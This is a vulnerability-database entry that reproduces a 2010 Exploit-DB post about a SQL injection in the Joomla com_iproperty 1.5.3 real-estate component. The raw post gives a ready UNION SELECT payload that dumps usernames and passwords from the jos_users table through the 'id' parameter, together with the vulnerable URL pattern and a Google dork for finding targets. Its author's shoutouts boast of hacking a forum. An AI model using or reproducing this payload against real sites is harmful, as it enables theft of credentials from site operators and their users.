Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability

vendor:

Intellectual Property

by:

v3n0m

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Intellectual Property

Affected Version From: 1.5.2003

Affected Version To: 1.5.2003

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2010

Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability

The Joomla Component com_iproperty 1.5.3 (id) is vulnerable to SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the target system.

Mitigation:

The vendor has not released a patch or mitigation for this vulnerability. It is recommended to disable or remove the affected component until a patch is available.

Source

Exploit-DB raw data:

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
										.WEB.ID
-----------------------------------------------------------------------
 Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://yogyacarderlink.web.id/
Date		: April, 15-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: Thinkery Intellectual Property
Vendor  	: http://iproperty.thethinkery.net/
Price		: $225 USD
Version 	: 1.5.3 Other versions may also be affected
Google Dork	: inurl:com_iproperty

Intellectual Property allows independent real estate agents, brokers, or property 
management companies to upload and maintain property listings for sale, for rent and for lease. 
Upload photos, add categories, sub-categories, agent profiles, company profiles. 
Search with an advanced Google Map-Ajax-based map interface. Allow users to save and 
manage favorite properties. Quickly customize colors, filters, galleries and more!
----------------------------------------------------------------

Exploitz:
~~~~~~~

-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--


SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/index.php?option=com_iproperty&view=agentproperties&id=[elich4]
----------------------------------------------------------------

Shoutz:
~~~~

- 'oH lawd !! Malingsial lame forum g0t hacked for second times by Us,lulz...'
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,c4uR [tumben ga bawa martabak??],mywisdom,yadoy666,udhit
- elicha cristia [me too... :)]
- N.O.C & Technical Support @office
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~

v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
Homepage: http://yogyacarderlink.web.id/
	  http://v3n0m.blogdetik.com/
	  http://elich4.blogspot.com/ << Update donk >_<

---------------------------[EOF]--------------------------------